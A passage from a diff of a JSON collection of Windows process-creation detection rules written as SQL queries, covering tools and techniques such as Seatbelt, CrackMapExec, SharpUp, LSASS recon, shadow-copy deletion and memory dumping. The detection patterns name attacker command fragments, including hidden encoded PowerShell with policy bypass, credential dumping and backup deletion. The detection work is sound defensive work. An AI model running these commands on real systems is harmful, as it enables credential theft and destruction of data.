Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process 
(MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' 
ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - 
"title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE 
'%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' 
ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR 
CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% 
/nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": 
"6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as 
system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' 